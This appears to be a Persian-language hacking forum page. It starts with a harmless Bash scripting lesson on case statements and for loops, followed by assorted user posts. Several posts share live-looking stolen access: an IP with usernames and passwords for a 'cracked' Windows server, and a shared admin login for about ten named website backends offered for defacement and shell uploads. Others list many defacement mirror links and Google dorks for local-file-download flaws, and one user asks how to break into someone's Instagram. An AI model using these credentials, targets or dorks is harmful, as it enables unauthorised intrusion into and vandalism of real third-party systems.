    بخش دوم - قسمت ششم استفاده از دستور case برای کوتاه کردن if-then-else : در بعضی شرایط مثل مثال زیر ما میتونیم از گیر دستورالعمل ها دربیایم و میانبر بزنیم یجورایی : $ cat test25.sh #!/bin/bash # if [ $USER = "rednaxela" ] then echo "Welcome $USER" elif [ $USER = "red" ] then echo "Welcome $USER" elif [ $USER = "blue" ] then echo "Welcom $USER" elif [ $USER = "white" ] then echo "voroode shoma mojaz nist" else echo "user shoma sabt nashode" fi $ ./test25.sh Welcome rednaxela الکی تکرار کردن کد هارو در مثال بالا دیدید ؟ حالا کاربرد مثال اصلی رو بهتر متوجه میشید : استفاده از case : فرمت و مثال : case variable in pattern1 | pattern2) commands;; pattern3) commands;; *) commands;; esac $ cat test26.sh #!/bin/bash # estefade az case baraye shoroote motevali # case $USER in rednaxela | red | blue) echo "Welcome $USER";; white) echo "voroode shoma mojaz nist";; *) echo "user shoma sabt nashode";; esac $ ./test26.sh Welcome rednaxela مشاهده کردید که چقدر کار ساده تر و تمیز تر انجام شد دقیقا مثل اسکریپت قبلی ورود سه یوزر اول مجاز بود , به یوزر چهارم پیام ممنوعیت داده شد و در نهایت برای هر مقدار ورودی دیگه ای پیام یوزر شما ثبت نشده داده شد حلقه ها : با استفاده از حلقه ها یاد میگیرید چطور پروسه هارو تکرار کنید دستور for : گاهی شما نیاز دارید بعضی دستورات تا زمان خاصی تکرار بشن , با استفاده از این دستور حلقه ای ساخته میشه که این کارو انجام میده , فرمت و مثال : for var in list do commands done $ cat test1 #!/bin/bash # for var1 in red blue green white pink do echo range zibaye : $var1 done $ ./test1 range zibaye : red range zibaye : blue range zibaye : green range zibaye : white range zibaye : pink مشاهده کردید که متغیر در هر مرحله یکی از عناصر لیست رو به ترتیب نگه داشته و دستورات رو اجرا کرده و بعد عنصر بعدی بعد از اتمام لیست متغیر درون حلقه اخرین مقدار رو نگه میداره مگر اینکه تغیرش بدید , مثال زیر : $ cat test1b #!/bin/bash # teste moteghayere daroone halghe for var1 in red blue green white pink do echo range zibaye : $var1 done # echo "akharin rangi ke print kardim : $var1" var1=black echo "range jadid : $var1" $ ./test1b range zibaye : red range zibaye : blue range zibaye : green range zibaye : white range zibaye : pink akharin rangi ke print kardim : pink range jadid : black همینطور میتونید از متغیر ها به عنوان لیست برای حلقه استفاده کنید : $ cat test4 #!/bin/bash # list="red blue green pink" list=$list" white" # for var1 in $list do echo "range zibaye : $var1" done $ ./test4 range zibaye : red range zibaye : blue range zibaye : green range zibaye : pink range zibaye : white نمونه بعدی , استفاده از خروجی یک دستور به عنوان لیست در حلقه : $ cat test5 #!/bin/bash # for var in $(cat file) do echo "range zibaye : $var" done در مثال بالا مقادیر لیستمون در یک فایل ذخیره شده بوده , و ما اون فایل رو با دستور cat خوندیم , و مقدار خروجی دستور رو به عنوان ورودی دادیم به متغیر داخل حلقه , توجه داشته باشید که در مثال بالا مقدار فایل خط به خط خونده میشه , یعنی مثل متغیر در مثال قبلی مقادیر با فاصله از هم جدا نمیشن بلکه هر کدوم در یک خط جدا قرار میگیرن جدا کننده فیلد ها : متغیر محیطی IFS) internal field separator) مشخص میکنه چه چیزی مرز بین فیلد هاست به عنوان مثال به صورت پیش فرض فاصله , تب و خط جدید تعریف شدن مثلا اگه شما بخواید فقط خط جدید به عنوان بخش بندی فیلد ها در نظر گرفته بشه , مقدار متغیر رو به مقدار زیر تغیر بدید IFS=$'\n' اضافه کردن مثال بالا به اسکریپت , باعث میشه شل علامت های فاصله و تب رو به عنوان جدا کننده فیلد قبول نکنه در اسکریپت های طولانی ممکنه در هر بخشی مقدار مشخص شده ای رو برای جدا سازی فیلد ها لازم داشته باشید و نیاز به تغیر های متعدد در متغیر فعلی داشته باشید , برای این کار قبل از تغیر در متغیر از مقدارش نمونه گیری میکنیم IFS.OLD=$IFS IFS=$'\n' < va har vaght lazem bood reset mikonim : > IFS=$IFS.OLD بسته به نیازتون مقادیر مختلفی میشه تعریف کرد , به صورت تکی یا دسته جمعی IFS=: IFS=$'\n':;" خوندن دایرکتوری با wildcard ها : شما میتونید با استفاده از for فایل های دایرکتوری رو بخونید وقتی اسم کامل فایل یا مسیرش رو نمیدونید این موضوع کاربرد پیدا میکنه $ cat test6 #!/bin/bash # for file in /home/rednaxela/test/* do if [ -d "$file" ] then echo "$file yek directory hastesh" elif [ -f "$file" ] then echo "$file yek file hastesh" fi done $ ./test6 /home/rednaxela/test/dir1 yek directory hastesh /home/rednaxela/test/myprog.c yek file hastesh /home/rednaxela/test/myprog yek file hastesh /home/rednaxela/test/myscript yek file hastesh /home/rednaxela/test/newdir yek directory hastesh /home/rednaxela/test/newfile yek file hastesh /home/rednaxela/test/newfile2 yek file hastesh /home/rednaxela/test/testdir yek directory hastesh /home/rednaxela/test/testing yek file hastesh /home/rednaxela/test/testprog yek file hastesh /home/rednaxela/test/testprog.c yek file hastesh دقت کنید در مثال بالا مقدار متغیر فایل رو در شرط ها بین دابل کوتیشن گذاشتیم در صورتی که در بخش اموزشش چنین چیزی نگفته بودیم ما این کارو کردیم چون در لینوکس فاصله بین اسم ابجکت ها عادیه و این باعث شد در صورت فاصله دار بودن اسم هر کدوم از فایل هایی که مرور شدن , هیچ مشگلی پیش نیاد یک مثال پویا تر : $ cat test7 #!/bin/bash # for file in /home/rednaxela/.b* /home/rednaxela/badtest do if [ -d "$file" ] then echo "$file yek directory hastesh" elif [ -f "$file" ] then echo "$file yek file hastesh" else echo "$file vojood nadarad" fi done $ ./test7 /home/rednaxela/.backup.timestamp yek file hastesh /home/rednaxela/.bash_history yek file hastesh /home/rednaxela/.bash_logout yek file hastesh /home/rednaxela/.bash_profile yek file hastesh /home/rednaxela/.bashrc yek file hastesh /home/rednaxela/badtest vojood nadarad استفاه از استایل C برای for : در این حالت ما از دستور for در بش به سبک استفاده در زبان C الگو میگیریم for (i = 0; i < 10; i++) { printf("shomare ye badi mishe : %d\n", i); } متغیر i در مثال بالا نقش شمارنده داره , که در اولین بخش مقدار پیش فرضش رو گرفته و در بخش دوم تا زمانی که مقدارش کوچکتر از 10 باشه حلقه ادامه پیدا میکنه و در بخش اخر متغیر بعد از هر بار مرور حلقه مقدارش افزایش پیدا میکنه و اما حالت زیر مثال اصلیمونه , فرمت و مثال : for (( variable assignment ; condition ; iteration process )) for (( a = 1; a < 10; a++ )) $ cat test8 #!/bin/bash # teste C-style for # for (( i=1; i <= 10; i++ )) do echo "shomare ye badi mishe : $i" done $ ./test8 shomare ye badi mishe : 1 shomare ye badi mishe : 2 shomare ye badi mishe : 3 shomare ye badi mishe : 4 shomare ye badi mishe : 5 shomare ye badi mishe : 6 shomare ye badi mishe : 7 shomare ye badi mishe : 8 shomare ye badi mishe : 9 shomare ye badi mishe : 10 شما میتونید در این فرمت از چند متغیر هم استفاده کنید , اما فقط یک شرط استفاده میشه , مثال : $ cat test9 #!/bin/bash # chand moteghayer # for (( a=1, b=10; a <= 10; a++, b-- )) do echo "$a - $b" done $ ./test9 1 - 10 2 - 9 3 - 8 4 - 7 5 - 6 6 - 5 7 - 4 8 - 3 9 - 2 10 - 1 پایان قسمت ششم از بخش دوم
  27. 1 امتیاز
    اطمینان داری مستقل عمل میکنه ؟ ممکنه به عنوان یک گره اطلاعات دانلودی رو فقط عبور بده از خودش ، و درخواست کننده اصلی نباشه به عنوان مثال ممکنه سیستم دیگه ای متصل باشه درکل میتونی از چک کردن تعاملات استفاده کنی برای این کار هم به عنوان مثال میتونی iftop رو در کامند لاین نصب و استفاده کنی یا از سیستم مانیتور تو محیط گرافیکی
  28. 1 امتیاز
    سلام کالی64 بیت روی روی virtual box نصب کردم، بعد از استارت کردن و وارد شدن، شروع میکنه به دانلود یک سری داده. در حالت عادی متوجه این دانلود نمیشم چون پیام یا اعلانی مبنی بر دانلود نمیده. اما رو ویندوز میزبان یک برنامه du speed meter دارم که وضعیت دانلود و اپلود رو کنترل و کنتور میکنه. با استارت کردن کالی و ورود بهش(نه قبل از اون) برنامه ماکزیمم سرعت دانلود رو نشون میده. چطوری میشه فهمید چی در حال دانلوده و چطوری مشکلشو حل کنم؟ با تشکر
  29. 1 امتیاز
    احتمالا سیستمتون 32 بیته ولی شما 64 نصب کردین یا virtualbox تون آپدیت نیست و یا شایدم به خاطر اینه که hyper-v سیستمتون فعال نیست. یکدوم از این حالتاست.
  30. 1 امتیاز
    R3DN4X314

    امنیت تگ iframe

    میتونی از Embed و Object استفاده کنی با استفاده از المنت Embed میتونی اپلیکیشن های اکسترنال اضافه کنی ، یا محتوای تعاملی مثل پلاگین و ... میتونی به این شکل استفادش کنی : <embed src="http://guardiran.org" width=”200″ height=”200" /> با استفاده از المنت Object هم میتونی از مولتی مدیا و ابجکت هایی از این قبیل استفاده کنی ، به شکل زیر <object data="http://guardiran.org" width="400" height="300" type="text/html">
  31. 1 امتیاز
    HRMBHH

    مخفی کردن لینک

    ممنون از شما دوست عزیز این که گفتید لینک رو hex کنم میتونید یه توضیح کوتاهی بدید؟ ممنون میشم
  32. 1 امتیاز
    سلام چطوری میشه اینستای کسی وارد شد بدون اینکه رمزش عوض شه یا بفهمه؟🤦‍♀️
  33. 1 امتیاز
    درود تارگت اشاره شده ، چه نوع تارگتی هست ؟ منظور یک مودم خانگی / شرکتی هست ؟
  34. 1 امتیاز
    proxy

    تاپیک vps های کرک شده

    117.102.224.162 user1:guardiran12 user2:guardiran121 password:guardiran1! windows server 2008 cpu 2 core ram 4 پسوردها رو تغیر ندید ممنون
  35. 1 امتیاز
    http://www.zone-h.org/mirror/id/32239670 http://www.zone-h.org/mirror/id/32239669 http://www.zone-h.org/mirror/id/32239668 http://www.zone-h.org/mirror/id/32239667 http://www.zone-h.org/mirror/id/32239666 http://www.zone-h.org/mirror/id/32239665 http://www.zone-h.org/mirror/id/32239664 http://www.zone-h.org/mirror/id/32239663 http://www.zone-h.org/mirror/id/32239662 http://www.zone-h.org/mirror/id/32239661 http://www.zone-h.org/mirror/id/32239658 http://www.zone-h.org/mirror/id/32239657 32-43
  36. 1 امتیاز
    بیشتر از 50 تارگت برای دیفیس داره و حتی میتونید شل آپ کنید // به نام تیم ثبت کنید (پسورد رو عوض نکنید تا همه بتوانند استغاده کنند حتی برای موارد تمرینی و بقیه موارد) بعضی از تارگت ها رو لیست کردم اما همه تارگت ها در وندور مشخص هست user admin : admin password : applezeed9 vendor : http://applezeed.com/portfolio.php http://www.grandtourismo.co.th/backend http://www.nicetrip.co.th/backend http://www.naratelbangkok.com/backend http://www.lookrig.com/backend http://www.overallsystemtrade.com/backend/ http://www.oldiesmusicthailand.com/backend/ http://www.melogistic.com/backend/ http://www.istyletraveler.com/backend/ http://www.sandasiamtour.com/backend/ ------------------------------------------------- موفق باشید
  37. 1 امتیاز
    ممنون از این که وقت گزاشتین تا جواب بدین ولی برای وب میخوام یه سری وب سایت هست که تو هاستشون دایرکتوری مخفی داره اونارو میخوام پیدا کنم نه ویندوز و.. مثلا از یکی شنیدم که همین سایت گوگل هاستشو اگه برسی کنی کلا یه فایل readme بیشتر نداره بقیش کلا مخفین ------------------------------------------------------------------------------------ معذرت,چشم دفعه بعد اونجا میپرسم اگه مشکلی یا سوالی بود
  38. 1 امتیاز
  39. 1 امتیاز
    http://zone-h.com/mirror/id/30039315 اینم مدیر کل سایتمون زده ثبت نشده بود من ثبت کردم
  40. 1 امتیاز
  41. 1 امتیاز
    http://aljyyosh.org/mirror.php?id=198752 http://aljyyosh.org/mirror.php?id=198753 http://aljyyosh.org/mirror.php?id=198754 http://aljyyosh.org/mirror.php?id=198755
  42. 1 امتیاز
  43. 1 امتیاز
    http://aljyyosh.org/mirror.php?id=194050 http://aljyyosh.org/mirror.php?id=194051 http://aljyyosh.org/mirror.php?id=194052 http://aljyyosh.org/mirror.php?id=194053 http://aljyyosh.org/mirror.php?id=194054
  44. 1 امتیاز
    http://aljyyosh.org/mirror.php?id=194401 http://aljyyosh.org/mirror.php?id=194402 http://aljyyosh.org/mirror.php?id=194403 http://aljyyosh.org/mirror.php?id=194404 http://aljyyosh.org/mirror.php?id=194406 http://aljyyosh.org/mirror.php?id=194407 http://aljyyosh.org/mirror.php?id=194408 http://aljyyosh.org/mirror.php?id=194410 http://aljyyosh.org/mirror.php?id=194411 http://aljyyosh.org/mirror.php?id=194413 http://aljyyosh.org/mirror.php?id=194414 http://aljyyosh.org/mirror.php?id=194415 http://aljyyosh.org/mirror.php?id=194416 http://aljyyosh.org/mirror.php?id=194417 http://aljyyosh.org/mirror.php?id=194419 http://aljyyosh.org/mirror.php?id=194418 http://aljyyosh.org/mirror.php?id=194420 http://aljyyosh.org/mirror.php?id=194421 http://aljyyosh.org/mirror.php?id=194422 http://aljyyosh.org/mirror.php?id=194423 http://aljyyosh.org/mirror.php?id=194375 http://aljyyosh.org/mirror.php?id=194376 http://aljyyosh.org/mirror.php?id=194377 http://aljyyosh.org/mirror.php?id=194378 http://aljyyosh.org/mirror.php?id=194379 http://aljyyosh.org/mirror.php?id=194380 http://aljyyosh.org/mirror.php?id=194381 http://aljyyosh.org/mirror.php?id=194382 http://aljyyosh.org/mirror.php?id=194383 http://aljyyosh.org/mirror.php?id=194384 http://aljyyosh.org/mirror.php?id=194385 http://aljyyosh.org/mirror.php?id=194386 http://aljyyosh.org/mirror.php?id=194387 http://aljyyosh.org/mirror.php?id=194388 http://aljyyosh.org/mirror.php?id=194389 http://aljyyosh.org/mirror.php?id=194390 http://aljyyosh.org/mirror.php?id=194391 http://aljyyosh.org/mirror.php?id=194392 http://aljyyosh.org/mirror.php?id=194394 http://aljyyosh.org/mirror.php?id=194395 http://aljyyosh.org/mirror.php?id=194397 http://aljyyosh.org/mirror.php?id=194398 http://aljyyosh.org/mirror.php?id=194399 http://aljyyosh.org/mirror.php?id=194350 http://aljyyosh.org/mirror.php?id=194352 http://aljyyosh.org/mirror.php?id=194351 http://aljyyosh.org/mirror.php?id=194353 http://aljyyosh.org/mirror.php?id=194354 http://aljyyosh.org/mirror.php?id=194355 http://aljyyosh.org/mirror.php?id=194356 http://aljyyosh.org/mirror.php?id=194357 http://aljyyosh.org/mirror.php?id=194358 http://aljyyosh.org/mirror.php?id=194359 http://aljyyosh.org/mirror.php?id=194360 http://aljyyosh.org/mirror.php?id=194361 http://aljyyosh.org/mirror.php?id=194362 http://aljyyosh.org/mirror.php?id=194363 http://aljyyosh.org/mirror.php?id=194364 http://aljyyosh.org/mirror.php?id=194365 http://aljyyosh.org/mirror.php?id=194366 http://aljyyosh.org/mirror.php?id=194367 http://aljyyosh.org/mirror.php?id=194368 http://aljyyosh.org/mirror.php?id=194369 http://aljyyosh.org/mirror.php?id=194370 http://aljyyosh.org/mirror.php?id=194371 http://aljyyosh.org/mirror.php?id=194372 http://aljyyosh.org/mirror.php?id=194374 http://aljyyosh.org/mirror.php?id=194373 http://aljyyosh.org/mirror.php?id=194325 http://aljyyosh.org/mirror.php?id=194326 http://aljyyosh.org/mirror.php?id=194327 http://aljyyosh.org/mirror.php?id=194328 http://aljyyosh.org/mirror.php?id=194329 http://aljyyosh.org/mirror.php?id=194330 http://aljyyosh.org/mirror.php?id=194331 http://aljyyosh.org/mirror.php?id=194332 http://aljyyosh.org/mirror.php?id=194333 http://aljyyosh.org/mirror.php?id=194334 http://aljyyosh.org/mirror.php?id=194336 http://aljyyosh.org/mirror.php?id=194335 http://aljyyosh.org/mirror.php?id=194337 http://aljyyosh.org/mirror.php?id=194339 http://aljyyosh.org/mirror.php?id=194338 http://aljyyosh.org/mirror.php?id=194340 http://aljyyosh.org/mirror.php?id=194341 http://aljyyosh.org/mirror.php?id=194342 http://aljyyosh.org/mirror.php?id=194344 http://aljyyosh.org/mirror.php?id=194343 http://aljyyosh.org/mirror.php?id=194346 http://aljyyosh.org/mirror.php?id=194347 http://aljyyosh.org/mirror.php?id=194348 http://aljyyosh.org/mirror.php?id=194349 http://aljyyosh.org/mirror.php?id=194325 http://aljyyosh.org/mirror.php?id=194326 http://aljyyosh.org/mirror.php?id=194327 http://aljyyosh.org/mirror.php?id=194329 http://aljyyosh.org/mirror.php?id=194328 http://aljyyosh.org/mirror.php?id=194330 http://aljyyosh.org/mirror.php?id=194332 http://aljyyosh.org/mirror.php?id=194331 http://aljyyosh.org/mirror.php?id=194333 http://aljyyosh.org/mirror.php?id=194334 http://aljyyosh.org/mirror.php?id=194335 http://aljyyosh.org/mirror.php?id=194336 http://aljyyosh.org/mirror.php?id=194337 http://aljyyosh.org/mirror.php?id=194338 http://aljyyosh.org/mirror.php?id=194339 http://aljyyosh.org/mirror.php?id=194340 http://aljyyosh.org/mirror.php?id=194341 http://aljyyosh.org/mirror.php?id=194342 http://aljyyosh.org/mirror.php?id=194343 http://aljyyosh.org/mirror.php?id=194344 http://aljyyosh.org/mirror.php?id=194346 http://aljyyosh.org/mirror.php?id=194345 http://aljyyosh.org/mirror.php?id=194347 http://aljyyosh.org/mirror.php?id=194348 http://aljyyosh.org/mirror.php?id=194349 http://aljyyosh.org/mirror.php?id=194319 http://aljyyosh.org/mirror.php?id=194320 http://aljyyosh.org/mirror.php?id=194321 http://aljyyosh.org/mirror.php?id=194322 http://aljyyosh.org/mirror.php?id=194323 http://aljyyosh.org/mirror.php?id=194324 http://aljyyosh.org/mirror.php?id=194300 http://aljyyosh.org/mirror.php?id=194302 http://aljyyosh.org/mirror.php?id=194301 http://aljyyosh.org/mirror.php?id=194303 http://aljyyosh.org/mirror.php?id=194305 http://aljyyosh.org/mirror.php?id=194304 http://aljyyosh.org/mirror.php?id=194306 http://aljyyosh.org/mirror.php?id=194307 http://aljyyosh.org/mirror.php?id=194308 http://aljyyosh.org/mirror.php?id=194309 http://aljyyosh.org/mirror.php?id=194310 http://aljyyosh.org/mirror.php?id=194311 http://aljyyosh.org/mirror.php?id=194312 http://aljyyosh.org/mirror.php?id=194313 http://aljyyosh.org/mirror.php?id=194315 http://aljyyosh.org/mirror.php?id=194314 http://aljyyosh.org/mirror.php?id=194316 http://aljyyosh.org/mirror.php?id=194317 http://aljyyosh.org/mirror.php?id=194299 http://aljyyosh.org/mirror.php?id=194298
  45. 1 امتیاز
  46. 1 امتیاز
  47. 1 امتیاز
    دورک باگ lfd inurl:"download.php?file=" inurl:"download.php?src=" inurl:"download.php?url=" inurl:"download.php?f=" inurl:"download.php?book_file=" inurl:"download.php?di_key=" inurl:"download.php?path=" inurl:"download.php?dfile=" inurl:"download.php?get=" inurl:"download.php?u=" inurl:"dl.php?file=" inurl:"down.php?dd=" inurl:"down.php?name=" inurl:"down.php?downfile" inurl:"down.php?arq=" inurl:"file.php?src=" inurl:"download.php?downloadFile" inurl:"download.php?page="
  48. 1 امتیاز
    با عرض خسته نباشید خدمت دوستان و عزیزان در حد کمک در زمینه برنامه نویسی php و دیزاین سایت می تونم در خدمت باشم البته مدیریت نمیخوام چون سرم شلوغه
  49. 1 امتیاز
    من برای مدیریت بخش برنامه نویسی کاملا آماده ام و اگر بتونم کمکی بکنم خوشحال میش شوم
  50. 1 امتیاز
    mtnblack

    مطالب

    بله منم با این دوست عزیز موافقم... بهتره تعداد آخرین ارسال ها رو به 10 یا 15 افزایش بدید تا دوستان بتونن از مطالبی که پیش تر پاسخ داده شده رو هم نگاه کنن... ممنون از مدیر گرامی بخاطر تدابیرشون